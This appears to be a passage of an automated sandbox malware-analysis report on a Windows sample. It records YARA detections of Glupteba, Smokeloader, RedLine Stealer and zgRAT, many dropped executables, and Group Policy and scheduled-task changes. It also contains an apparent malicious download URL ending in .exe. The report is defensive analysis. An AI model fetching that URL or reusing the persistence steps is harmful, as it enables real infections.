9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B0E000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zanzibarpivo.com:80/7725eaa6592c80f8124e769b4e8a07f7.exeJ

                        E-Banking Fraud

                        barindex
                        Yara detected Glupteba
                        Source: Yara matchFile source: 36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.1.PA8JWMmRYiQsN7iqTjOvjsbW.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.1.zUOgRazdYnb35XHU4UIsV9Yc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 43.1.OYqxk9G3x4R05N4I0KLZXbXg.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.1.68bEfZA6FBu6lC5BaADYSIdx.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000024.00000001.2063500056.0000000000843000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000001.1883456337.0000000000843000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000001.1945506899.0000000000843000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000001.2017532049.0000000000843000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PA8JWMmRYiQsN7iqTjOvjsbW.exe PID: 8176, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: zUOgRazdYnb35XHU4UIsV9Yc.exe PID: 7204, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 0FR80IiNvxJZyXnpOgiDlYNV.exe PID: 4252, type: MEMORYSTR

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Writes many files with high entropy
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe entropy: 7.99614337359Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QV2CtvThMWBnTkQtNtmINgo7.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\bfxtyeVJT5bBfIUy0v6XVgPU.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe entropy: 7.99614337359Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\75ML2QNSkdxIefrPkvr0UjCi.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe entropy: 7.99614337359Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\fkwQUocr72Hw75SyPBzpetnQ.exe entropy: 7.99614337359Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\wv3L00mTLTTnOX1S2obszDcX.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\QFdxqcJJKBnNvVH34NTBZO9k.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\s2d02ZEHUbxI410yPzvUYGTP.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\MLHy8CHCXXPjzOh2OJFrG13g.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\zFZkiprzkq8Ae7mkklwscu5a.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\r0DfbOvsdOtWhxCPYUgwqjYI.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\Pictures\7ajn4zo6v0GdgVSDv67pQ6UA.exe entropy: 7.99150344378Jump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exe entropy: 7.99823692801Jump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exe entropy: 7.99823692801Jump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exe entropy: 7.99613628014Jump to dropped file
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe entropy: 7.99613628014Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeFile created: C:\Users\user\AppData\Local\Temp\ff086fda entropy: 7.99714560633Jump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_package entropy: 7.99999212861Jump to dropped file
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exe entropy: 7.99999212861Jump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_package entropy: 7.99998944371Jump to dropped file
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exe entropy: 7.99998944429Jump to dropped file

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000022.00000002.2122134547.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 0000000B.00000002.2255300318.000000000411C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000004.00000002.2259248364.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 0000001D.00000002.1939799886.000000000439C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000022.00000002.2121373428.00000000040CC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 0000001D.00000002.1938329589.0000000004300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 0000001B.00000002.1937757105.000000000408C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000015.00000002.1930196904.000000000434C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 0000001B.00000002.1940278884.00000000043C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeCode function: 24_2_0040EA54 NtQuerySystemInformation,24_2_0040EA54
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Windows\System32\GroupPolicy\gpt.ini
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Windows\System32\GroupPolicy\Machine
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Windows\System32\GroupPolicy\User
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exeFile created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol
                        Source: C:\Windows\SysWOW64\schtasks.exeFile created: C:\Windows\Tasks\bWycNackLSywaqkmgR.job
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile created: C:\Windows\system32\GroupPolicy\Adm
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                        Source: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exeFile created: C:\Windows\SysWOW64\GroupPolicy\gpt.ini
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exeFile deleted: C:\Windows\SysWOW64\GroupPolicytcUHV
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385EEA400_2_00007FF6385EEA40
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F0AE00_2_00007FF6385F0AE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385DB0200_2_00007FF6385DB020
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385FD2100_2_00007FF6385FD210
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F17B00_2_00007FF6385F17B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385D59500_2_00007FF6385D5950
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385E19D00_2_00007FF6385E19D0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385D8AC00_2_00007FF6385D8AC0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385DFBA00_2_00007FF6385DFBA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F2BF00_2_00007FF6385F2BF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385D4CA00_2_00007FF6385D4CA0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F4D500_2_00007FF6385F4D50
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385C9FF00_2_00007FF6385C9FF0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F00A00_2_00007FF6385F00A0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6386EC0800_2_00007FF6386EC080
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385E11120_2_00007FF6385E1112
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385E22B00_2_00007FF6385E22B0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385EB3200_2_00007FF6385EB320
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F63600_2_00007FF6385F6360
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6385F58E00_2_00007FF6385F58E0
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041B84B4_2_0041B84B
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040BA804_2_0040BA80
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040C2AC4_2_0040C2AC
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004123A04_2_004123A0
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040F4414_2_0040F441
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040BD2A4_2_0040BD2A
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0042153C4_2_0042153C
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040C6A04_2_0040C6A0
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_004087614_2_00408761
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0041BF694_2_0041BF69
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040B70E4_2_0040B70E
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: 4_2_0040BFF14_2_0040BFF1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041B84B11_2_0041B84B
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040BA8011_2_0040BA80
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040C2AC11_2_0040C2AC
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_004123A011_2_004123A0
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040F44111_2_0040F441
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040BD2A11_2_0040BD2A
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0042153C11_2_0042153C
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040C6A011_2_0040C6A0
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040876111_2_00408761
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0041BF6911_2_0041BF69
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040B70E11_2_0040B70E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_0040BFF111_2_0040BFF1
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBC51311_2_05BBC513
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBBCE711_2_05BBBCE7
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBBF9111_2_05BBBF91
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBF6A811_2_05BBF6A8
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BC260711_2_05BC2607
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BB89C811_2_05BB89C8
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBC90711_2_05BBC907
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBB97511_2_05BBB975
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BCBAB211_2_05BCBAB2
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCode function: 11_2_05BBC25811_2_05BBC258
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041B84B19_2_0041B84B
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040BA8019_2_0040BA80
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040C2AC19_2_0040C2AC
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_004123A019_2_004123A0
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040F44119_2_0040F441
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040BD2A19_2_0040BD2A
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0042153C19_2_0042153C
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040C6A019_2_0040C6A0
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040876119_2_00408761
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0041BF6919_2_0041BF69
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040B70E19_2_0040B70E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_0040BFF119_2_0040BFF1
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEC51319_2_05CEC513
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEBCE719_2_05CEBCE7
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEBF9119_2_05CEBF91
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEF6A819_2_05CEF6A8
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CF260719_2_05CF2607
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CE89C819_2_05CE89C8
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEB97519_2_05CEB975
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEC90719_2_05CEC907
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CFBAB219_2_05CFBAB2
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: 19_2_05CEC25819_2_05CEC258
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041B84B21_2_0041B84B
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040BA8021_2_0040BA80
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040C2AC21_2_0040C2AC
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_004123A021_2_004123A0
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040F44121_2_0040F441
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040BD2A21_2_0040BD2A
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0042153C21_2_0042153C
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040C6A021_2_0040C6A0
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040876121_2_00408761
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0041BF6921_2_0041BF69
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040B70E21_2_0040B70E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_0040BFF121_2_0040BFF1
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CBCE721_2_041CBCE7
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CC51321_2_041CC513
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041D260721_2_041D2607
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CF6A821_2_041CF6A8
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CBF9121_2_041CBF91
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CC90721_2_041CC907
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CB97521_2_041CB975
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041C89C821_2_041C89C8
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041CC25821_2_041CC258
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: 21_2_041DBAB221_2_041DBAB2
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE1BE3 appears 40 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE1D46 appears 39 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 00409CC0 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE9F27 appears 48 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05D0780B appears 43 times
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCode function: String function: 05CE36F8 appears 130 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C9F27 appears 48 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 004275A4 appears 43 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041C1D46 appears 39 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 041E780B appears 43 times
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCode function: String function: 00409CC0 appears 48 times
